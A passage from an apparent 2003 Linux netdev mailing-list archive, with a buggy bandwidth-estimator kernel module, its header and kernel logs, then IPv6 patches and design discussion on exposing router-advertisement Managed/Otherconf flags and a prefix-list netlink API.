Lock the dev_base */ read_lock(&dev_base_lock); /** Lock the bwusage_head */ write_lock(&bwusage_head_lock); for(dev = dev_base; dev != NULL; dev = dev -> next) { struct bwusage *bwusage = kmalloc(sizeof(bwusage), GFP_KERNEL); if(bwusage == NULL) { /** Free allocated memory */ for(bwusage = bwusage_head; bwusage;) { struct bwusage *u = bwusage -> next; kfree(bwusage); bwusage = u; } /** Unlock the bwusage_head */ write_unlock(&bwusage_head_lock); /** Unlock the dev_base */ read_unlock(&dev_base_lock); /** Return error */ return -ENOBUFS; } bwusage -> next = NULL; dev_hold(dev); bwusage -> name = dev -> name; __dev_put(dev); bwusage -> rx_bps = 0; bwusage -> rx_avbps = 0; bwusage -> rx_pps = 0; bwusage -> rx_avpps = 0; bwusage -> rx_bytes = 0; bwusage -> rx_packets = 0; bwusage -> tx_bps = 0; bwusage -> tx_avbps = 0; bwusage -> tx_pps = 0; bwusage -> tx_avpps = 0; bwusage -> tx_bytes = 0; bwusage -> tx_packets = 0; if(bwusage_head == NULL) { bwusage_head = bwusage; } else { current_bwusage -> next = bwusage; } current_bwusage = bwusage; printk(KERN_INFO "bwestimator: Adding %s device (%s), rx_bytes, %lu, rx_packets, %lu, rx_bps, %lu, rx_avbps, %lu, rx_pps, %lu, rx_avpps, %lu\n", dev->name, bwusage -> name, bwusage -> rx_bytes, bwusage -> rx_packets, bwusage -> rx_bps, bwusage -> rx_avbps, bwusage -> rx_pps, bwusage -> rx_avpps); } /** Initialize and setup the timer */ init_timer(&estimator_timer); estimator_timer.function = check_bandwidth; value = 0; estimator_timer.data = (unsigned long) &value; estimator_timer.expires = jiffies + HZ; /* One second */ add_timer(&estimator_timer); /** Unlock the bwusage_head */ write_unlock(&bwusage_head_lock); /** Unlock the dev_base */ read_unlock(&dev_base_lock); printk("<1>bwestimator: Starting bandwidth usage estimation\n"); return 0; } /** * cleanup_module: Module cleanup function */ void cleanup_module() { struct bwusage *current_bwusage; unsigned long flags; /** Lock the bwusage_head */ write_lock(&bwusage_head_lock); /** Delete the timer */ del_timer(&estimator_timer); /** Free allocated memory */ for(current_bwusage = bwusage_head; current_bwusage;) { struct bwusage *u = current_bwusage -> next; printk(KERN_INFO "bwestimator: Deleting %s device\n", current_bwusage -> name ? current_bwusage -> name : "null"); kfree(current_bwusage); current_bwusage = u; } bwusage_head = NULL; /** Unlock the bwusage_head */ write_unlock(&bwusage_head_lock); printk("<1>bwestimator: Stopping bandwidth usage estimation\n"); } /** * check_bandwidth(): Checks the bandwidth usage on interfaces */ void check_bandwidth(unsigned long ptr) { struct net_device *dev; struct bwusage *bwusage; unsigned long *data = (unsigned long *) ptr; unsigned long nbytes, old_nbytes; unsigned long npackets, old_npackets; unsigned long rate; /** Count to print the debug message */ static unsigned count = 0; unsigned long flags; /** Read lock the dev_base */ read_lock(&dev_base_lock); /** Read lock the bwusage_head */ write_lock(&bwusage_head_lock); if(count >= 5) { /** Unlock the bwusage_head */ write_unlock(&bwusage_head_lock); /** Unlock the dev_base */ read_unlock(&dev_base_lock); return; } for(dev = dev_base, bwusage = bwusage_head; dev != NULL && bwusage != NULL; dev = dev -> next, bwusage = bwusage -> next) { struct net_device_stats *stats; dev_hold(dev); stats = (dev -> get_stats ? dev -> get_stats(dev) : (struct net_device_stats *)NULL); if(stats) { #if 0 nbytes = stats -> tx_bytes; npackets = stats -> tx_packets; /** Tx_bps */ rate = (nbytes - bwusage -> tx_bytes) << (7 - idx); bwusage -> tx_bytes = nbytes; bwusage -> tx_avbps += ((long)rate - (long)bwusage ->tx_avbps) >> ewma_log; bwusage -> tx_bps = (bwusage -> tx_avbps + 0xF) >> 5; /** Tx_pps */ rate = (u32) ((npackets - bwusage -> tx_packets) << (12 - idx)); bwusage -> tx_packets = npackets; bwusage -> tx_avpps = (u32) (bwusage -> tx_avpps + (((long)rate - (long)bwusage ->tx_avpps) >> ewma_log)); bwusage -> tx_pps = (u32) ((bwusage -> tx_avpps + 0x1FF) >> 10); /** Rx_bps */ nbytes = stats -> rx_bytes; npackets = stats -> rx_packets; old_nbytes = bwusage -> rx_bytes; old_npackets = bwusage -> rx_packets; rate = (nbytes - bwusage -> rx_bytes) << (7 - idx); bwusage -> rx_bytes = nbytes; bwusage -> rx_avbps += ((long)rate - (long)bwusage ->rx_avbps) >> ewma_log; bwusage -> rx_bps = (bwusage -> rx_avbps + 0xF) >> 5; printk(KERN_INFO "bwestimator: device, %s, nbytes, %lu, npackets, %lu, old_nbytes, %lu, old_npackets, %lu, rate, %lu, rx_avbps, %lu, rx_bps, %lu, idx, %d, ewma_log, %d\n", dev -> name, nbytes, npackets, old_nbytes, old_npackets, rate, bwusage -> rx_avbps, bwusage -> rx_bps, idx, ewma_log); /** Rx_pps */ rate = (u32) ((npackets - bwusage -> rx_packets) << (12 - idx)); bwusage -> rx_packets = npackets; bwusage -> rx_avpps = (u32) (bwusage -> rx_avpps + (((long)rate - (long)bwusage ->rx_avpps) >> ewma_log)); bwusage -> rx_pps = (u32) ((bwusage -> rx_avpps + 0x1FF) >> 10); /* printk(KERN_INFO "bwestimator: Device, %6s, nbytes, %llu, npackets, %lu, rxbps, %lu, rxpps, %lu, txbps, %lu, txpps, %lu\n", bwusage->name, nbytes, npackets, bwusage->rx_bps, bwusage->rx_pps, bwusage->tx_bps, bwusage->tx_pps ); */ #endif } else { printk(KERN_INFO "bwestimator: Device: %6s. No statistics available.\n", dev->name); } __dev_put(dev); } mod_timer(&estimator_timer, jiffies + HZ); printk(KERN_INFO "bwestimator: dev: %s. bwusage: %s.\n", dev ? "non-null" : "null", bwusage ? "non-null" : "null"); count++; /** Unlock the bwusage_head */ write_unlock(&bwusage_head_lock); /** Unlock the dev_base */ read_unlock(&dev_base_lock); return; } MODULE_LICENSE("GPL"); --------------Boundary-00=_I5B1Z16K2MEMVO8EMDU8 Content-Type: text/x-chdr; charset="us-ascii"; name="bwestimator.h" Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="bwestimator.h" #include #include #include #include #include #include /** Timer */ //extern struct timer_list estimator_timer; /** We assume that the list of devices in dev_base does not change and * hence once the list of usage is built for each device, we assume that * there is a one-to-one correspondence in the list of devices and the * list of usage structures. */ /** Usage structure list */ struct bwusage { struct bwusage *next; char *name; unsigned long rx_bps; unsigned long rx_avbps; unsigned long rx_pps; unsigned long rx_avpps; unsigned long rx_bytes; unsigned long rx_total_bytes; unsigned long rx_packets; unsigned long rx_total_packets; unsigned long tx_bps; unsigned long tx_avbps; unsigned long tx_pps; unsigned long tx_avpps; unsigned long tx_bytes; unsigned long tx_total_bytes; unsigned long tx_packets; unsigned long tx_total_packets; }; extern struct bwusage *bwusage_head; /** bwusage_head lock */ extern rwlock_t bwusage_head_lock; --------------Boundary-00=_I5B1Z16K2MEMVO8EMDU8 Content-Type: text/x-log; charset="us-ascii"; name="messages.log" Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="messages.log" Jul 14 16:23:55 elans-pc kernel: bwestimator: Adding lo device (lo), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:23:55 elans-pc kernel: bwestimator: Adding eth0 device (eth0), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:23:55 elans-pc kernel: bwestimator: Adding eth1 device (eth1), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:23:55 elans-pc kernel: bwestimator: Adding eth2 device (eth2), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:23:55 elans-pc kernel: bwestimator: Adding eth3 device (eth3), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:23:55 elans-pc kernel: bwestimator: Adding eth4 device (eth4), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:23:55 elans-pc kernel: bwestimator: Adding eth5 device (eth5), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:23:55 elans-pc kernel: bwestimator: Starting bandwidth usage estimation Jul 14 16:23:56 elans-pc kernel: bwestimator: dev: null. bwusage: null. Jul 14 16:24:00 elans-pc last message repeated 4 times Jul 14 16:24:01 elans-pc kernel: bwestimator: Deleting lo device Jul 14 16:24:01 elans-pc kernel: bwestimator: Deleting eth0 device Jul 14 16:24:01 elans-pc kernel: bwestimator: Deleting eth1 device Jul 14 16:24:01 elans-pc kernel: bwestimator: Deleting eth2 device Jul 14 16:24:01 elans-pc kernel: bwestimator: Deleting eth3 device Jul 14 16:24:01 elans-pc kernel: bwestimator: Deleting eth4 device Jul 14 16:24:01 elans-pc kernel: bwestimator: Deleting eth5 device Jul 14 16:24:01 elans-pc kernel: bwestimator: Stopping bandwidth usage estimation Jul 14 16:24:05 elans-pc kernel: bwestimator: Adding lo device (lo), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:05 elans-pc kernel: bwestimator: Adding eth0 device (eth0), rx_bytes, 0, rx_packets, 3433504032, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:05 elans-pc kernel: bwestimator: Adding eth1 device (eth1), rx_bytes, 0, rx_packets, 3433504000, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:05 elans-pc kernel: bwestimator: Adding eth2 device (eth2), rx_bytes, 0, rx_packets, 3433503968, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:05 elans-pc kernel: bwestimator: Adding eth3 device (eth3), rx_bytes, 0, rx_packets, 3433503936, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:05 elans-pc kernel: bwestimator: Adding eth4 device (eth4), rx_bytes, 0, rx_packets, 3433503904, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:05 elans-pc kernel: bwestimator: Adding eth5 device (eth5), rx_bytes, 0, rx_packets, 3433503872, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:05 elans-pc kernel: bwestimator: Starting bandwidth usage estimation Jul 14 16:24:06 elans-pc kernel: bwestimator: dev: non-null. bwusage: null. Jul 14 16:24:10 elans-pc last message repeated 4 times Jul 14 16:24:19 elans-pc kernel: bwestimator: Deleting lo device Jul 14 16:24:19 elans-pc kernel: bwestimator: Stopping bandwidth usage estimation Jul 14 16:24:22 elans-pc kernel: bwestimator: Adding lo device (lo), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:22 elans-pc kernel: bwestimator: Adding eth0 device (eth0), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:22 elans-pc kernel: bwestimator: Adding eth1 device (eth1), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:22 elans-pc kernel: bwestimator: Adding eth2 device (eth2), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:22 elans-pc kernel: bwestimator: Adding eth3 device (eth3), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:22 elans-pc kernel: bwestimator: Adding eth4 device (eth4), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:22 elans-pc kernel: bwestimator: Adding eth5 device (eth5), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:22 elans-pc kernel: bwestimator: Starting bandwidth usage estimation Jul 14 16:24:23 elans-pc kernel: bwestimator: dev: null. bwusage: null. Jul 14 16:24:27 elans-pc last message repeated 4 times Jul 14 16:24:30 elans-pc kernel: bwestimator: Deleting lo device Jul 14 16:24:30 elans-pc kernel: bwestimator: Deleting eth0 device Jul 14 16:24:30 elans-pc kernel: bwestimator: Deleting eth1 device Jul 14 16:24:30 elans-pc kernel: bwestimator: Deleting eth2 device Jul 14 16:24:30 elans-pc kernel: bwestimator: Deleting eth3 device Jul 14 16:24:30 elans-pc kernel: bwestimator: Deleting eth4 device Jul 14 16:24:30 elans-pc kernel: bwestimator: Deleting eth5 device Jul 14 16:24:30 elans-pc kernel: bwestimator: Stopping bandwidth usage estimation Jul 14 16:24:35 elans-pc kernel: bwestimator: Adding lo device (lo), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:35 elans-pc kernel: bwestimator: Adding eth0 device (eth0), rx_bytes, 0, rx_packets, 3433504224, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:35 elans-pc kernel: bwestimator: Adding eth1 device (eth1), rx_bytes, 0, rx_packets, 3433504192, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:35 elans-pc kernel: bwestimator: Adding eth2 device (eth2), rx_bytes, 0, rx_packets, 3433504160, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:35 elans-pc kernel: bwestimator: Adding eth3 device (eth3), rx_bytes, 0, rx_packets, 3433504128, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:35 elans-pc kernel: bwestimator: Adding eth4 device (eth4), rx_bytes, 0, rx_packets, 3433504096, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:35 elans-pc kernel: bwestimator: Adding eth5 device (eth5), rx_bytes, 0, rx_packets, 3433504064, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0 Jul 14 16:24:35 elans-pc kernel: bwestimator: Starting bandwidth usage estimation Jul 14 16:24:36 elans-pc kernel: bwestimator: dev: non-null. bwusage: null. Jul 14 16:24:40 elans-pc last message repeated 4 times Jul 14 16:24:40 elans-pc kernel: bwestimator: Deleting lo device Jul 14 16:24:40 elans-pc kernel: bwestimator: Stopping bandwidth usage estimation --------------Boundary-00=_I5B1Z16K2MEMVO8EMDU8-- From krkumar@us.ibm.com Mon Jul 14 15:37:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 15:37:47 -0700 (PDT) Received: from e6.ny.us.ibm.com (e6.ny.us.ibm.com [32.97.182.106]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EMbXFl013709 for ; Mon, 14 Jul 2003 15:37:36 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e6.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6EMahkh192752; Mon, 14 Jul 2003 18:36:43 -0400 Received: from DYN318430.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6EMaecB125234; Mon, 14 Jul 2003 18:36:41 -0400 Date: Mon, 14 Jul 2003 15:35:15 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: yoshfuji@linux-ipv6.org cc: davem@redhat.com, , , , Subject: [PATCH 1/4] Prefix List against 2.5.73 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4022 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev I am sending the latest patches against 2.5.73 and 2.4.21 with the changes mentioned in my previous mail. I have also split the patch based on the functionalities - prefix list and O/M flags of an RA. At the bottom of this mail contains the patch for setting/getting O/M flags against 2.5.73. The next three mails contain patches for prefix list against 2.5.73, and both of these patches against 2.4.21. Please apply the O/M flags patch before the prefix list patch. Thanks, - KK --------------------------------------------------------------------------- > You do not explain why we (or kernel) NEED(s) this. > It is not so important how SMALL it is > though it may cause problems how LARGE it is. I had explained the reasons for having prefix list i/f in my previous mail. To recap : - User don't need to know what the definition of a prefix is, all he has to do is ask the kernel and get the list. Otherwise different user apps will have to know the definition of a prefix and parse the entry themselves. The parsing is non-trivial (eg the address should not LL or MC, there should be no nexthop and it should be added via an RA, etc). - The kernel code to get the prefix list is small, the top level inet6_dump_fib uses either the dump_node or the dump_prefix, the latter being the new user interface. Having a user interface makes it easier to get the prefix list without significant bloat to the kernel. > This is design issue; how we should provide L3 per-interface > information to userspace; eg. in_device and/or inet6_dev things > including per-interface statistics. > > Since I think it is not appropriate to provide per-interface > statistics via RTM_xxxROUTE, so I don't agree to provide > the RA infomation (i.e. Manage/Otherconf Flags) via > RTM_xxxROUTE. > > Options: > - use RTM_xxxLINK for L3 operation > - introduce RTM_xxxIFACE for L3 per-interface operations Yes, there are a couple of different ways to do this. One is as you have suggested, but there is a problem with it. The existing RTM_GETLINK interface returns very generic elements of the dev (mtu, hardware address, dev statistics), while the change you suggested is specific to ipv6. I am not sure if this is a good design to implement. Either we could use the current (submitted) way or use a different RTM_GETADDR interface in inet6_fill_ifaddr (and introduce RTM_IFACEFLAGS). This will be specific to IPv6. Are you agreeable to this ? > Well, on moving forward; you can split your patch up to 3 things: > 1. fix routing flags > 2. provide Managed/Otherconf flags API > (3. provide the prefix list API (if it IS required)) > > I'm not against the first item. > We need to discuss on the design related to the 2nd item. > I don't think that we really need 3rd item. - I am ok with 1 :-) - I have suggested changes for 2, please let me know what you think, whether we can go with the old way or make the change suggested above. - I believe we need #3 for the reasons given above. Thanks, - KK ----------------------- PATCH for O/M against 2.5.73 -------------------- diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h PATCHES/linux-2.5.73/include/linux/rtnetlink.h --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 +++ PATCHES/linux-2.5.73/include/linux/rtnetlink.h 2003-07-14 12:11:51.000000000 -0700 @@ -330,6 +330,7 @@ IFA_LABEL, IFA_BROADCAST, IFA_ANYCAST, + IFA_IFFLAGS, IFA_CACHEINFO }; diff -ruN linux-2.5.73.org/include/net/if_inet6.h PATCHES/linux-2.5.73/include/net/if_inet6.h --- linux-2.5.73.org/include/net/if_inet6.h 2003-06-22 11:33:32.000000000 -0700 +++ PATCHES/linux-2.5.73/include/net/if_inet6.h 2003-07-14 10:30:59.000000000 -0700 @@ -17,6 +17,8 @@ #include +#define IF_RA_OTHERCONF 0x80 +#define IF_RA_MANAGED 0x40 #define IF_RA_RCVD 0x20 #define IF_RS_SENT 0x10 diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c PATCHES/linux-2.5.73/net/ipv6/addrconf.c --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 +++ PATCHES/linux-2.5.73/net/ipv6/addrconf.c 2003-07-14 12:22:07.000000000 -0700 @@ -2359,6 +2359,7 @@ static int inet6_fill_ifaddr(struct sk_buff *skb, struct inet6_ifaddr *ifa, u32 pid, u32 seq, int event) { + int flags; struct ifaddrmsg *ifm; struct nlmsghdr *nlh; struct ifa_cacheinfo ci; @@ -2389,6 +2390,8 @@ } RTA_PUT(skb, IFA_CACHEINFO, sizeof(ci), &ci); } + flags = ifa->idev->if_flags; + RTA_PUT(skb, IFA_IFFLAGS, sizeof(flags), &flags); nlh->nlmsg_len = skb->tail - b; return skb->len; diff -ruN linux-2.5.73.org/net/ipv6/ndisc.c PATCHES/linux-2.5.73/net/ipv6/ndisc.c --- linux-2.5.73.org/net/ipv6/ndisc.c 2003-06-22 11:32:56.000000000 -0700 +++ PATCHES/linux-2.5.73/net/ipv6/ndisc.c 2003-07-14 10:30:59.000000000 -0700 @@ -1036,6 +1036,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * receieved RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? + IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); ------------------------------------------------------------------------ From krkumar@us.ibm.com Mon Jul 14 15:41:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 15:41:34 -0700 (PDT) Received: from e34.co.us.ibm.com (e34.co.us.ibm.com [32.97.110.132]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EMfTFl014058 for ; Mon, 14 Jul 2003 15:41:30 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e34.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6EMedEh260732; Mon, 14 Jul 2003 18:40:39 -0400 Received: from DYN318430.beaverton.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6EMeZbU080426; Mon, 14 Jul 2003 16:40:36 -0600 Date: Mon, 14 Jul 2003 15:39:13 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: yoshfuji@linux-ipv6.org cc: davem@redhat.com, , , , Subject: [PATCH 2/4] O/M flags against 2.4.21 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4023 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev [ Sorry, PATCH 1/4 is a patch for O/M flags against 2.5.73, the subject was wrong.] ------------------- PATCH for O/M flags against 2.4.21 ------------------ diff -ruN linux-2.4.21.org/include/linux/rtnetlink.h PATCHES/linux-2.4.21/include/linux/rtnetlink.h --- linux-2.4.21.org/include/linux/rtnetlink.h 2002-11-28 15:53:15.000000000 -0800 +++ PATCHES/linux-2.4.21/include/linux/rtnetlink.h 2003-07-14 12:32:49.000000000 -0700 @@ -307,6 +307,7 @@ IFA_LABEL, IFA_BROADCAST, IFA_ANYCAST, + IFA_IFFLAGS, IFA_CACHEINFO }; diff -ruN linux-2.4.21.org/include/net/if_inet6.h PATCHES/linux-2.4.21/include/net/if_inet6.h --- linux-2.4.21.org/include/net/if_inet6.h 2003-06-13 07:51:39.000000000 -0700 +++ PATCHES/linux-2.4.21/include/net/if_inet6.h 2003-07-14 10:30:53.000000000 -0700 @@ -15,6 +15,8 @@ #ifndef _NET_IF_INET6_H #define _NET_IF_INET6_H +#define IF_RA_OTHERCONF 0x80 +#define IF_RA_MANAGED 0x40 #define IF_RA_RCVD 0x20 #define IF_RS_SENT 0x10 diff -ruN linux-2.4.21.org/net/ipv6/addrconf.c PATCHES/linux-2.4.21/net/ipv6/addrconf.c --- linux-2.4.21.org/net/ipv6/addrconf.c 2003-06-13 07:51:39.000000000 -0700 +++ PATCHES/linux-2.4.21/net/ipv6/addrconf.c 2003-07-14 12:21:50.000000000 -0700 @@ -1879,6 +1879,7 @@ static int inet6_fill_ifaddr(struct sk_buff *skb, struct inet6_ifaddr *ifa, u32 pid, u32 seq, int event) { + int flags; struct ifaddrmsg *ifm; struct nlmsghdr *nlh; struct ifa_cacheinfo ci; @@ -1909,6 +1910,8 @@ } RTA_PUT(skb, IFA_CACHEINFO, sizeof(ci), &ci); } + flags = ifa->idev->if_flags; + RTA_PUT(skb, IFA_IFFLAGS, sizeof(flags), &flags); nlh->nlmsg_len = skb->tail - b; return skb->len; diff -ruN linux-2.4.21.org/net/ipv6/ndisc.c PATCHES/linux-2.4.21/net/ipv6/ndisc.c --- linux-2.4.21.org/net/ipv6/ndisc.c 2003-06-13 07:51:39.000000000 -0700 +++ PATCHES/linux-2.4.21/net/ipv6/ndisc.c 2003-07-14 10:30:53.000000000 -0700 @@ -940,6 +940,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * receieved RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? + IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); ------------------------------------------------------------------------ From krkumar@us.ibm.com Mon Jul 14 15:43:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 15:43:52 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EMhiFl014401 for ; Mon, 14 Jul 2003 15:43:45 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e1.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6EMgrKb218730; Mon, 14 Jul 2003 18:42:53 -0400 Received: from DYN318430.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6EMgpcB138578; Mon, 14 Jul 2003 18:42:52 -0400 Date: Mon, 14 Jul 2003 15:41:26 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: yoshfuji@linux-ipv6.org cc: davem@redhat.com, , , , Subject: [PATCH 3/4] Prefix List against 2.5.73 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4024 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev --------------- Prefix List against 2.5.73 --------------------------- diff -ruN linux-2.5.73.org/include/linux/ipv6_route.h PATCHES/linux-2.5.73/include/linux/ipv6_route.h --- linux-2.5.73.org/include/linux/ipv6_route.h 2003-06-22 11:32:36.000000000 -0700 +++ PATCHES/linux-2.5.73/include/linux/ipv6_route.h 2003-07-14 10:30:59.000000000 -0700 @@ -44,4 +44,16 @@ #define RTMSG_NEWROUTE 0x21 #define RTMSG_DELROUTE 0x22 +/* + * Return entire prefix list in array of following structures. Provides the + * prefix and prefix length for all devices. + */ + +struct in6_prefix_msg +{ + int ifindex; + int prefix_len; + struct in6_addr prefix; +}; + #endif diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h PATCHES/linux-2.5.73/include/linux/rtnetlink.h --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 +++ PATCHES/linux-2.5.73/include/linux/rtnetlink.h 2003-07-14 12:11:51.000000000 -0700 @@ -47,7 +47,9 @@ #define RTM_DELTFILTER (RTM_BASE+29) #define RTM_GETTFILTER (RTM_BASE+30) -#define RTM_MAX (RTM_BASE+31) +#define RTM_GETPLIST (RTM_BASE+34) + +#define RTM_MAX (RTM_GETPLIST+1) /* Generic structure for encapsulation of optional route information. @@ -201,9 +203,10 @@ RTA_FLOW, RTA_CACHEINFO, RTA_SESSION, + RTA_RA6INFO, /* No support yet, send event on new prefix event */ }; -#define RTA_MAX RTA_SESSION +#define RTA_MAX RTA_RA6INFO #define RTM_RTA(r) ((struct rtattr*)(((char*)(r)) + NLMSG_ALIGN(sizeof(struct rtmsg)))) #define RTM_PAYLOAD(n) NLMSG_PAYLOAD(n,sizeof(struct rtmsg)) diff -ruN linux-2.5.73.org/include/net/ip6_route.h PATCHES/linux-2.5.73/include/net/ip6_route.h --- linux-2.5.73.org/include/net/ip6_route.h 2003-06-22 11:32:37.000000000 -0700 +++ PATCHES/linux-2.5.73/include/net/ip6_route.h 2003-07-14 10:30:59.000000000 -0700 @@ -87,6 +87,7 @@ struct nlmsghdr; struct netlink_callback; extern int inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb); +extern int inet6_dump_prefix(struct sk_buff *skb, struct netlink_callback *cb); extern int inet6_rtm_newroute(struct sk_buff *skb, struct nlmsghdr* nlh, void *arg); extern int inet6_rtm_delroute(struct sk_buff *skb, struct nlmsghdr* nlh, void *arg); extern int inet6_rtm_getroute(struct sk_buff *skb, struct nlmsghdr* nlh, void *arg); diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c PATCHES/linux-2.5.73/net/ipv6/addrconf.c --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 +++ PATCHES/linux-2.5.73/net/ipv6/addrconf.c 2003-07-14 12:22:07.000000000 -0700 @@ -129,7 +129,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -715,7 +715,7 @@ ift->prefered_lft = tmp_prefered_lft; ift->tstamp = ifp->tstamp; spin_unlock_bh(&ift->lock); - 